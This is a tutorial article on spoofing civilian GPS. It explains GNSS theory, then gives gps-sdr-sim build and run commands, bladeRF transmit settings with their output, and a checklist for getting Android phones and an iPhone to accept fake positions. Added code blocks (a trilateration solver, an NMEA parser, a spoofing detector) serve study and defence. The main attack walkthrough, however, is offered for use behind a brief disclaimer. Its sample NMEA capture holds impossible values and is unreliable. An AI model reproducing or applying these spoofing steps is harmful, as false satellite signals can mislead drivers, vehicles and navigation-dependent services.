GPS spoofing: How to become a satellite

Each of us uses satellite navigation to get anywhere outside our backyard. But what if GPS all of a sudden stops working and can no longer be used to determine your location? This article presents an efficient technique for fooling GPS.

warning

Never perform the actions described below near airports or other facilities that depend heavily on georeferencing! On-the-air operations require special permission and must comply with safety requirements. All information provided in this article is for educational purposes only. Neither the author nor the Editorial Board can be held liable for potential consequences arising from the use of this information.

Theory

GNSS

A Global Navigation Satellite System (GNSS) enables its users to determine their location. Technically, GNSS is a network that includes various satellite and ground systems. The most popular positioning systems are the American GPS and the Russian GLONASS. You might also know Galileo (EU) and BeiDou (China), but they are much less widespread.

Three main groups of devices (segments) are involved in determining your location: the space segment, the user segment, and the ground-based control segment.

As you might have guessed, space devices are satellites. Each system has its own satellites with different orbits. Satellites broadcast data at different frequencies and at different time intervals to avoid interference with each other.

Ground systems synchronize time, validate information on satellites, adjust orbits, and monitor the key functions of satellites (to ensure that they operate normally).

The user segment is represented by client devices that determine their location using GNSS. The simplest example is a standard GNSS receiver in your phone.

To determine its location, the end device must receive information from the satellites and process it. The procedure of processing the signals and identifying the location is called triangulation (there are other techniques as well, but they are beyond the scope of this article).

Frequencies

Depending on the satellite system, GNSS transmits data on different frequencies. Let’s briefly examine the three main bands, their frequencies, and what each of them is used for.

GNSS operates on three main bands: L1, L2, and L5. They were introduced sequentially as enhanced versions of the navigation system. Together, they are simply called the L band (or the decimeter-wave band). This band describes frequencies from 1 to 2 GHz (or from 1000 to 2000 MHz). Several navigation systems can operate on one band at once: for instance, GPS, GLONASS, and Galileo operate simultaneously on the L1 band.

L1 is the oldest band used by almost all satellite navigation systems. Since it’s old, almost all receivers can pick it up. Its only disadvantage is that the signal in this frequency range poorly bends around obstacles (e.g. walls of buildings, foliage, thick clouds, etc.) and hardly passes through them.

L2 was introduced to replace L1. Its signal bends around obstacles better, and you can pick it up even in hard-to-reach places. The band is considered new and is normally used in combination with L1.

L5 is the latest technology used primarily in aviation, although civilian receivers can sometimes use it as well.

More about bands and frequencies

GPS operates in all three bands, while the alternative navigation systems haven’t occupied all available frequencies yet. L1 accommodates GPS (1575.42 MHz), GLONASS (1602 MHz), and Galileo (1575.42 MHz). In L2, GPS operates at 1227.6 MHz and GLONASS at 1246 MHz. L5 is used by Galileo (1207.14 MHz and 1176.45 MHz) and GPS (a single frequency of 1176.45 MHz).

Civilian and military services use different frequencies; this article addresses only the civilian ones. Military signals are also much more accurate and are encrypted to prevent their use by unfriendly forces.

The same band can be used for different purposes depending on the navigation system.

Frequencies and bands used by GNSS

ARNS frequencies are normally used in aviation, while ground-based receivers use RNSS frequencies.

Triangulation and trilateration

A satellite cannot send you your location, since every user is in a different place and your device doesn’t transmit anything to the outside world. In other words, your coordinates must be computed on the receiver side, and a single signal isn’t sufficient for this. Accordingly, you have to pick up several (at least three or four) signals at once. Each signal carries the transmitting satellite’s own coordinates and the time it was sent. From this data, you can determine your location using simple formulas. The two main methods used to determine your coordinates are triangulation and trilateration.

Triangulation identifies the location of a point from three reference points. Here the satellites act as the reference points, but the problem is that they fly at an altitude of some 20,000 km, and to use this method you must know the distance to each satellite very accurately. To simplify positioning, trilateration is used instead.

Trilateration determines the coordinates of a point as the intersection of spheres centred on the reference points.

Trilateration: the fourth measurement precisely determines your location. The intersection of four spheres gives a single point

The distance to each satellite is the signal’s travel time from the satellite to the receiver multiplied by the speed of light, but for that you need to know exactly when the signal was sent.
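To make the “several signals” requirement concrete, here is an added worked example (not code from the article or from any GNSS chipset) of how a receiver turns four or more measured ranges into a position and a clock correction. The geometry is constructed for the demonstration: five satellite positions at roughly GPS orbital radius and a receiver on the surface, all in Earth-centred metres, with a receiver clock that runs 1 ms fast. The solver is the textbook Gauss-Newton linearisation; the unknown clock bias is the fourth unknown, which is why a fourth satellite is needed.

```python
import math

C = 299_792_458.0  # speed of light in vacuum, m/s


def _solve(A, b):
    """Solve the small square system A·x = b by Gaussian elimination with partial pivoting."""
    n = len(A)
    M = [row[:] + [b[i]] for i, row in enumerate(A)]
    for col in range(n):
        piv = max(range(col, n), key=lambda r: abs(M[r][col]))
        M[col], M[piv] = M[piv], M[col]
        for r in range(col + 1, n):
            f = M[r][col] / M[col][col]
            for c in range(col, n + 1):
                M[r][c] -= f * M[col][c]
    x = [0.0] * n
    for r in range(n - 1, -1, -1):
        x[r] = (M[r][n] - sum(M[r][c] * x[c] for c in range(r + 1, n))) / M[r][r]
    return x


def pseudoranges(sats, receiver, clock_offset_s):
    """What a receiver actually measures: geometric range plus the range error caused
    by its own clock being clock_offset_s ahead of satellite time (constructed data)."""
    return [math.dist(s, receiver) + C * clock_offset_s for s in sats]


def trilaterate(sats, ranges, iters=20, tol=1e-6):
    """Gauss-Newton solution for the receiver position (x, y, z) in metres and the
    clock bias b = c·dt in metres, starting from the Earth's centre."""
    if len(sats) < 4:
        raise ValueError("need at least four satellites: three coordinates plus clock bias")
    p, bias = [0.0, 0.0, 0.0], 0.0
    for _ in range(iters):
        J, resid = [], []
        for s, rho in zip(sats, ranges):
            d = math.dist(s, p)
            # partial derivatives of the modelled pseudorange d + bias
            J.append([(p[k] - s[k]) / d for k in range(3)] + [1.0])
            resid.append(rho - (d + bias))
        # normal equations (JᵀJ)·delta = Jᵀ·resid, so more than four satellites also work
        JtJ = [[sum(row[a] * row[b] for row in J) for b in range(4)] for a in range(4)]
        Jtr = [sum(row[a] * r for row, r in zip(J, resid)) for a in range(4)]
        delta = _solve(JtJ, Jtr)
        p = [p[k] + delta[k] for k in range(3)]
        bias += delta[3]
        if max(abs(v) for v in delta) < tol:
            break
    return p, bias


# Constructed geometry: five satellites about 26 000 km from the Earth's centre
# and a receiver on the surface (about 6 300 km from the centre), in ECEF-style metres.
SATS = [
    (15.0e6, 10.0e6, 19.0e6),
    (20.0e6, -5.0e6, 17.0e6),
    (5.0e6, 22.0e6, 14.0e6),
    (-10.0e6, 14.0e6, 20.0e6),
    (12.0e6, 2.0e6, 23.0e6),
]
TRUE_RECEIVER = (4.0e6, 3.0e6, 3.9e6)
CLOCK_OFFSET_S = 1e-3  # receiver clock 1 ms fast: ~300 km of range error if ignored


def demo():
    """Measure the constructed ranges, solve, and return (position, clock offset in s)."""
    ranges = pseudoranges(SATS, TRUE_RECEIVER, CLOCK_OFFSET_S)
    pos, bias = trilaterate(SATS, ranges)
    return pos, bias / C


def position_error_m():
    """Distance between the solved and the true receiver position, in metres."""
    pos, _ = demo()
    return math.dist(pos, TRUE_RECEIVER)


if __name__ == "__main__":
    pos, dt = demo()
    print("position error (m):", position_error_m())
    print("recovered clock offset (s):", dt)
```

The receiver starts its iteration at the centre of the Earth with no idea of the time; after a few iterations it recovers both its position and the 1 ms clock error, which, uncorrected, would have shifted every range by about 300 km. This is also why the spoofing section below cares so much about the time transmitted by the rogue satellites: the receiver solves for time, so inconsistent time produces inconsistent ranges.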

A simple way to determine your coordinates

In practice, if you have a microcontroller, you can find out your coordinates without solving any linear algebra yourself. Cheap GNSS receiver modules do this for you and output your coordinates, together with the satellite system they were derived from, in the NMEA format.

GPS receiver

NMEA is a standardized format for transmitting GNSS data. If you build a device that works with GNSS, you only need to support NMEA; there is no need to study the documentation for each satellite system’s own format.

To get the required data, you can connect to the receiver via USB or UART. Since I only have a UART with soldered connections, I built a bridge based on an Arduino board and went outside to collect some data.

If you use a ready-made GNSS receiver, then its output will look approximately as shown below:

$GPRMC,102668.00,A,2565.63860,N,05723.41802,E,44.621,122.82,301122,,,A*54
$GPVTG,122.82,T,,M,44.621,N,82.638,K,A*34
$GPGGA,102669.00,2995.64530,N,05723.40668,E,1,04,2.16,19.7,M,-26.4,M,,*48
$GPGSA,A,3,07,09,04,14,,,,,,,,,6.09,2.16,5.70*05
$GPGSV,2,1,05,04,43,108,34,07,53,338,35,09,73,051,37,14,33,217,28*7B
$GPGSV,2,2,05,16,04,038,*44
$GPGLL,2585.64930,N,05123.40668,E,102608.00,A,A*6E
$GPRMC,107129.00,A,2565.63860,N,05723.41802,E,47.084,123.07,301122,,,A*5C

These strings are messages in the NMEA format (i.e. satellite data already processed by the GNSS receiver). They don’t look very clear, but it’s quite easy to extract your coordinates from them.

Let’s examine the first message as an example:

$GPRMC,102668.00,A,2565.63860,N,05723.41802,E,44.621,122.82,301122,,,A*54

As you can see, each message begins with a dollar sign followed by five letters and a comma. This header indicates the type of data contained in the message. The first two letters (here GP) identify the GNSS system the information was received from; GP means GPS. You may encounter other satellite systems as well; the possible variants are:

  • GP – GPS only;
  • GL – GLONASS only;
  • BD – BeiDou only;
  • GA – Galileo only; and 
  • GN – multiple systems are used simultaneously.

The next three letters indicate the message type (e.g. RMC: Recommended Minimum Specific GNSS Data). Your coordinates are contained in the RMC, GLL, and GGA messages.

You can skip all fields except the coordinates (descriptions of the skipped fields can be found in the NMEA documentation). 2565.63860,N is the latitude in the DDMM.MMMMM format, where N means the northern hemisphere; 05723.41802,E is the longitude in the DDDMM.MMMMM format, where E means the eastern hemisphere. In other words, the coordinates of the test point are 25 degrees 65.63860 minutes north latitude and 57 degrees 23.41802 minutes east longitude.

To view this point on online maps, you have to convert the coordinates from degrees and minutes to decimal degrees (degrees + minutes/60). For this purpose, you can use an online calculator.
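As an added example (not code from the article or from any library), the following parser does what the online calculator does and a little more: it verifies the NMEA checksum, extracts the fix from RMC and GGA sentences, and converts DDMM.MMMMM / DDDMM.MMMMM values to signed decimal degrees. The two sample sentences are the widely circulated NMEA 0183 example sentences, not lines from the capture above. Note that the minutes part of such a value must be below 60; the parser rejects anything else as an invalid coordinate.

```python
"""Parse NMEA 0183 RMC/GGA sentences: verify the checksum, extract the fix, and
convert DDMM.MMMMM / DDDMM.MMMMM coordinates to decimal degrees."""


def nmea_checksum(body: str) -> str:
    """XOR of every character between '$' and '*', as two upper-case hex digits."""
    cs = 0
    for ch in body:
        cs ^= ord(ch)
    return f"{cs:02X}"


def split_sentence(sentence: str) -> list:
    """Validate the framing and checksum, then return the comma-separated fields."""
    sentence = sentence.strip()
    if not sentence.startswith("$") or "*" not in sentence:
        raise ValueError("not an NMEA sentence: " + sentence)
    body, _, given = sentence[1:].partition("*")
    expected = nmea_checksum(body)
    if given.upper() != expected:
        raise ValueError(f"bad checksum {given}, expected {expected}")
    return body.split(",")


def dm_to_decimal(value: str, hemisphere: str) -> float:
    """Convert 'DDMM.MMMMM' (latitude) or 'DDDMM.MMMMM' (longitude) plus N/S/E/W
    into signed decimal degrees. Minutes must be below 60 to be a valid coordinate."""
    if not value or len(hemisphere) != 1 or hemisphere not in "NSEW":
        raise ValueError("empty coordinate or unknown hemisphere")
    dot = value.index(".")
    degrees = int(value[: dot - 2])       # everything before the last two integer digits
    minutes = float(value[dot - 2 :])     # MM.MMMMM
    if minutes >= 60.0:
        raise ValueError(f"minutes out of range in {value}")
    limit = 90 if hemisphere in "NS" else 180
    if degrees > limit:
        raise ValueError(f"degrees out of range in {value}")
    decimal = degrees + minutes / 60.0
    return -decimal if hemisphere in "SW" else decimal


def parse_fix(sentence: str) -> dict:
    """Return talker, message type, UTC time and decimal lat/lon from an RMC or GGA sentence."""
    f = split_sentence(sentence)
    talker, kind = f[0][:2], f[0][2:]
    if kind == "RMC":
        if f[2] != "A":
            raise ValueError("RMC status is not 'A' (no valid fix)")
        lat, lon = dm_to_decimal(f[3], f[4]), dm_to_decimal(f[5], f[6])
    elif kind == "GGA":
        if f[6] == "0":
            raise ValueError("GGA fix quality 0 (no fix)")
        lat, lon = dm_to_decimal(f[2], f[3]), dm_to_decimal(f[4], f[5])
    else:
        raise ValueError("no position in message type " + kind)
    return {"talker": talker, "type": kind, "utc": f[1], "lat": lat, "lon": lon}


# Widely circulated NMEA 0183 example sentences (not from the article's capture).
SAMPLE_RMC = "$GPRMC,123519,A,4807.038,N,01131.000,E,022.4,084.4,230394,003.1,W*6A"
SAMPLE_GGA = "$GPGGA,123519,4807.038,N,01131.000,E,1,08,0.9,545.4,M,46.9,M,,*47"

if __name__ == "__main__":
    for s in (SAMPLE_RMC, SAMPLE_GGA):
        print(parse_fix(s))
```

Both sample sentences decode to 48.1173° N, 11.5167° E. Checking the checksum before trusting a line matters on a noisy UART, where a single flipped character otherwise becomes a silently wrong position.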

TTFF

TTFF (time to first fix) is the time a GNSS receiver needs to collect satellite data and determine its location. This parameter is of key importance for spoofing.

If the receiver has no cached satellite data (a cold start), this can take up to twelve minutes, but usually two to three minutes are enough.

Practice

Plenty of GPS spoofing guides are available on the Internet, but all of them have one thing in common: they no longer work in 2023 (at least in my case). Many modern phones determine their location not only from satellites: they also use Wi-Fi and Bluetooth, and cell towers can be used for positioning as well. So let’s first try to spoof GPS data on an Android smartphone and see what problems arise along the way.

Equipment

The following equipment is used in my experiment:

  • bladeRF 2.0 Micro Xa4 as a transmitter;
  • HackRF One as a receiver and transmitter;
  • RFSPACE antenna; and 
  • Mi A2.

BladeRF
HackRF One
RFSPACE
Mi A2

GPS-SDR-SIM

GPS-SDR-SIM makes it possible to generate signal data for any location or trajectory. To do this, you have to download an ephemeris file (satellite coordinates at a specific time) and specify the location.


GPS-SDR-SIM is one of the most popular and best-known tools for GPS spoofing. At the time of publication, its repository had more than 2000 stars, and the project is updated regularly.

First of all, download the source code and build the program:

git clone https://github.com/Nuand/gps-sdr-sim
cd gps-sdr-sim
gcc gpssim.c -lm -O3 -o gps-sdr-sim

Then connect bladeRF and generate a file:

./gps-sdr-sim -e hour3060.22n -l 21.296965,-157.815687,100 -b 16 -o gpssim.bin -t $(date -u +%Y/%m/%d,%X)


Satellite data can be downloaded from the NASA website. The data are published hourly, which makes it possible to avoid the time-related error that almost all guides I have found contain.

The -t parameter sets the time that your rogue ‘satellites’ will transmit. It is of utmost importance, since new phones don’t accept outdated data, even data that is only two to three hours old.

Using static location mode.
Start time = 2022/11/02,07:21:33 (2234:285693)
Duration = 300.0 [sec]
02 180.0 25.6 22759545.5 6.5
06 54.7 20.9 23631267.8 5.3
11 90.0 38.3 22154769.5 4.3
12 355.4 46.2 21368898.6 4.0
13 163.0 4.3 25471171.1 10.3
15 186.1 19.4 24115672.2 7.7
19 38.7 3.5 25179568.2 5.6
20 119.8 1.4 25729982.2 7.7
24 102.8 78.9 20375053.9 3.1
25 312.8 32.9 22268020.3 5.5
29 231.8 37.9 22208289.9 5.3
32 306.8 14.9 24242464.5 8.5
Time into run = 300.0
Done!
Process time = 46.2 [sec]

Don’t worry if you get an Invalid Start Time error: it means that NASA hasn’t published the data for the current hour yet. Just wait a bit, download a new file, and repeat the generation.

When the file is ready, install a GPS monitoring application called GPS Test on the test device, run it, and start transmitting from your computer:

lll@lll ~/s/gps-sdr-sim (master)> bladeRF-cli -i
bladeRF> set frequency 1575.42M

For best results, it’s not recommended to set both RX and TX to the
same frequency. Instead, consider offsetting them by at least 1 MHz
and mixing digitally.

For the above reason, ‘set frequency ‘ is deprecated and
scheduled for removal in future bladeRF-cli versions.

Please use ‘set frequency rx’ and ‘set frequency tx’ to configure
channels individually.

RX1 Frequency: 1575419998 Hz (Range: [70000000, 6000000000])
RX2 Frequency: 1575419998 Hz (Range: [70000000, 6000000000])
TX1 Frequency: 1575419998 Hz (Range: [47000000, 6000000000])
TX2 Frequency: 1575419998 Hz (Range: [47000000, 6000000000])

bladeRF> set samplerate 2.6M

Setting RX1 sample rate – req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting RX2 sample rate – req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting TX1 sample rate – req: 2600000 0/1Hz, actual: 2600000 0/1Hz
Setting TX2 sample rate – req: 2600000 0/1Hz, actual: 2600000 0/1Hz

bladeRF> set bandwidth 2.5M

RX1 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
RX2 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
TX1 Bandwidth: 2500000 Hz (Range: [200000, 56000000])
TX2 Bandwidth: 2500000 Hz (Range: [200000, 56000000])

bladeRF> set gain tx 56

Setting TX1 overall gain to 56 dB
Gain TX1 overall: 56 dB (Range: [-23.75, 66])
dsa: -90 dB (Range: [-89.75, 0])

bladeRF> tx config file=/home/lll/soft/gps-sdr-sim/gpssim.bin format=bin
bladeRF> tx start
bladeRF> tx wait

Satellites with good signal levels are displayed on the smartphone screen.

Still, you can see that the system status is No Fix (i.e. the phone cannot determine its location). The green bars are the ‘satellites’ spoofed by bladeRF. In other words, the receiver is working and sees satellites, but the phone refuses to compute a fix. Sometimes it takes a while for the device to receive and process the data (TTFF); so, to keep the experiment clean, I rebooted the phone and kept transmitting for five minutes. Still no result: the phone kept ignoring my rogue satellites.

Since my file with coordinates had also expired, I set the clock on my phone back a little and changed the location: now it is 1 km from my real position. Why only 1 km? Based on my tests, if you change the coordinates significantly (i.e. suddenly ‘jump’ over a long distance), the phone may reject such data as implausible, so you have to change your fake coordinates gradually:

lll@lll ~/s/gps-sdr-sim (master)> ./gps-sdr-sim -e brdc2022_3060.22n -d 1000 -l 51.296965,124.815687,100 -b 16 -o gpssim.bin -t 2022/11/02,08:00:00

Using static location mode.
Start time = 2022/11/02,08:00:00 (2234:288000)
Duration = 1000.0 [sec]
02 174.0 43.6 21497540.2 3.6
05 140.4 4.3 25351515.3 6.8
06 41.5 11.5 24590008.1 4.2
11 66.9 36.4 22296887.8 3.3
12 20.6 45.8 21422074.0 3.1
15 176.8 7.9 25304780.7 8.2
18 198.6 4.3 25335825.2 10.3
20 104.6 6.7 25172344.8 4.8
22 314.6 4.6 25557500.2 8.9
24 146.6 63.7 20898055.3 2.7
25 332.2 40.0 21745559.7 3.7
29 253.1 49.9 21398805.8 3.4
32 290.3 19.4 23734754.8 6.5
Time into run = 1000.0
Done!
Process time = 142.4 [sec]

I ran the data transmission again and checked the result.

Now the status shows 3D Fix: location determined! The time received from the ‘satellites’ is 12:00, a little behind the phone clock, but still within normal limits. Depending on the device, the lifetime of satellite data ranges from thirty minutes to four hours. The real time on the smartphone (shown in the upper left corner) is 12:34, and an error of thirty-four minutes is considered normal when no other satellites are available.

iPhone

The situation on an iPhone is similar: the location can be spoofed without any problems. Let’s jump to the Persian Gulf!

Voila! Note that this is a new phone that had never seen a GPS signal before, so it picked up the fake location pretty quickly. Wi-Fi and the cellular network failed to convince the phone that its coordinates were fake.

Critical points to pay attention to

Below are a few simple rules to keep in mind when you spoof GPS:

  1. Check the validity of the data taken from the NASA website regularly, since they are updated frequently;
  2. Monitor the time your ‘satellites’ transmit to the device: some phones don’t work with data that is too outdated;
  3. Give your device time to ‘save’ the fake satellites;
  4. Don’t change your location to a distant one at once: such implausible values will be ignored, and it will then take longer to process normal signals;
  5. Pay attention to Wi-Fi and cellular communications: sometimes they can be used to determine the location (although on new devices this won’t help);
  6. Use an appropriate antenna; and 
  7. If you use HackRF, make sure you have an external quartz resonator; otherwise the time will ‘float’.

Additional observations and assumptions:

  • Different satellites operate in different parts of the Earth; so, to increase the chance of success, spoof only satellites that are most often used in your current location;
  • Some maps use third-party sources to determine locations. Apple Maps and Google Maps data sometimes differ. Google positioning is more accurate;
  • If you clear old GPS data, you can fool almost any device; and 
  • To increase your chances, set the time (in the data taken from the NASA website) as close to reality as possible; if this doesn’t help, give the device some time (up to 10-15 minutes) to process the new data. On most new devices, this step will certainly be required.
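The checks the phones applied above, rejecting satellite time that is too far from their own clock and rejecting implausible jumps, are exactly what a defender can implement on the receiving side. The following monitor is an added example, not code from the article or from any handset: it takes already-parsed fixes (GNSS time, the device’s own clock, latitude, longitude) and flags a fix whose satellite time disagrees with the system clock by more than a threshold, whose satellite time runs backwards, or which implies a speed that no vehicle reaches. The thresholds, the helper names and the constructed track (which starts at the coordinates from the gps-sdr-sim command above) are assumptions made for the demonstration.

```python
import math
from datetime import datetime, timedelta, timezone

EARTH_RADIUS_M = 6_371_000.0
# Thresholds are assumptions chosen for this example, not values from the article
# or from any handset's firmware; tune them for the device class you monitor.
MAX_PLAUSIBLE_SPEED_MPS = 300.0   # faster than any road or rail vehicle
MAX_CLOCK_SKEW_S = 2 * 3600       # satellite time vs. the device's own clock


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two latitude/longitude points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def check_fix(prev, cur):
    """Return the anomaly flags raised by fix `cur` given the previous fix `prev` (or None).
    A fix is a dict with gnss_time and system_time (aware datetimes), lat and lon."""
    flags = []
    skew = abs((cur["gnss_time"] - cur["system_time"]).total_seconds())
    if skew > MAX_CLOCK_SKEW_S:
        flags.append("clock_skew")
    if prev is not None:
        dt = (cur["gnss_time"] - prev["gnss_time"]).total_seconds()
        if dt <= 0:
            flags.append("time_not_monotonic")
        else:
            dist = haversine_m(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            if dist / dt > MAX_PLAUSIBLE_SPEED_MPS:
                flags.append("implausible_jump")
    return flags


def monitor(fixes):
    """Run check_fix over a sequence; return {index: flags} for the fixes that raised any."""
    out, prev = {}, None
    for i, fix in enumerate(fixes):
        flags = check_fix(prev, fix)
        if flags:
            out[i] = flags
        prev = fix
    return out


def _fix(t0, seconds, lat, lon, skew_minutes=34):
    """Build a constructed fix whose device clock is skew_minutes ahead of GNSS time."""
    gnss = t0 + timedelta(seconds=seconds)
    return {"gnss_time": gnss, "system_time": gnss + timedelta(minutes=skew_minutes),
            "lat": lat, "lon": lon}


def demo():
    """Constructed track: a 1.5 m/s walk from the coordinates used in the article's
    gps-sdr-sim command, then a ~500 km jump within 10 s, then a fix whose satellite
    time lags the phone clock by 3 h 10 min. The 34-minute skew of the normal fixes
    mirrors the offset the article observed and is accepted."""
    t0 = datetime(2022, 11, 2, 12, 0, tzinfo=timezone.utc)
    lat0, lon0 = 51.296965, 124.815687
    fixes = [_fix(t0, 10 * i, lat0 + 0.000135 * i, lon0) for i in range(5)]  # ~15 m per 10 s
    fixes.append(_fix(t0, 50, 55.8, lon0))                    # 4.5 degrees of latitude in 10 s
    fixes.append(_fix(t0, 60, 55.8, lon0, skew_minutes=190))  # stale satellite time
    return monitor(fixes)


if __name__ == "__main__":
    print(demo())
```

On the constructed track the walk passes, the 500 km jump is flagged as implausible_jump, and the fix with a 3 h 10 min skew is flagged as clock_skew while the 34-minute skew is tolerated. A gradual 1 km drift of the kind the article used stays below a speed threshold, which is exactly why such a monitor should be combined with other position sources (Wi-Fi, cell) rather than used alone.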

Conclusions

Even though device manufacturers take various steps to prevent spoofing, it’s still possible under certain conditions. And the more autonomous devices appear in our world, the more severe this problem becomes. It’s one thing to prank a friend by ‘sending’ his phone to Senegal, and quite another to make a self-driving Tesla take a wrong turn…

Beware!

